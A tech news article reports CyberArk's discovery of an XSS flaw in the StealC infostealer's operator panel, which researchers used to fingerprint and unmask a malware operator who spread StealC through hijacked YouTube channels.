CyberArk researchers have identified a cross-site scripting (XSS) flaw in the web-based control panel used by operators of StealC, an info-stealing malware, which allowed them to observe active sessions and gather technical intelligence on the attackers’ hardware and configurations. StealC emerged in early 2023 and quickly gained popularity on dark web cybercrime forums due to its evasion capabilities and extensive data theft functionality.
Over time, the malware’s developer introduced multiple enhancements. The release of version 2.0 in April 2025 included Telegram bot support for real-time alerts and a new builder capable of generating StealC builds according to custom templates and data theft rules. Around the same period, the source code for StealC’s administration panel was leaked, offering researchers a chance to analyze its operations. By exploiting the XSS vulnerability, CyberArk was able to collect browser and hardware fingerprints of operators, retrieve active session cookies, and hijack panel sessions remotely. Researchers noted that the vulnerability exposed details such as operating system, device type, language settings, and general geographic indicators.
The investigation highlighted the activities of a StealC customer referred to as ‘YouTubeTA,’ who hijacked old, legitimate YouTube channels likely using compromised credentials to distribute malware. Campaigns run by the operator throughout 2025 collected over 5,000 victim logs, including approximately 390,000 passwords and 30 million cookies, most of which were not sensitive. The majority of infections occurred when victims searched for cracked versions of Adobe Photoshop and After Effects. CyberArk researchers were able to trace the operator’s device to an Apple M3 system, with English and Russian language settings, an Eastern European time zone, and an IP address linked to Ukrainian ISP TRK Cable TV after the operator failed to connect through a VPN.
CyberArk emphasized that malware-as-a-service platforms like StealC allow rapid scaling of operations but also increase the risk of exposure for threat actors. Researcher Ari Novick noted that disclosing the existence of the XSS flaw could disrupt operations, particularly in light of a recent spike in the number of StealC operators, possibly following incidents involving the Lumma malware platform. By revealing the vulnerability, CyberArk hopes operators will reconsider the use of StealC and reassess security measures, potentially impacting the broader MaaS market. This research provides insights into how exploitation of administrative panel vulnerabilities can reveal operational patterns and technical details of malicious actors while supporting defensive cybersecurity efforts.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
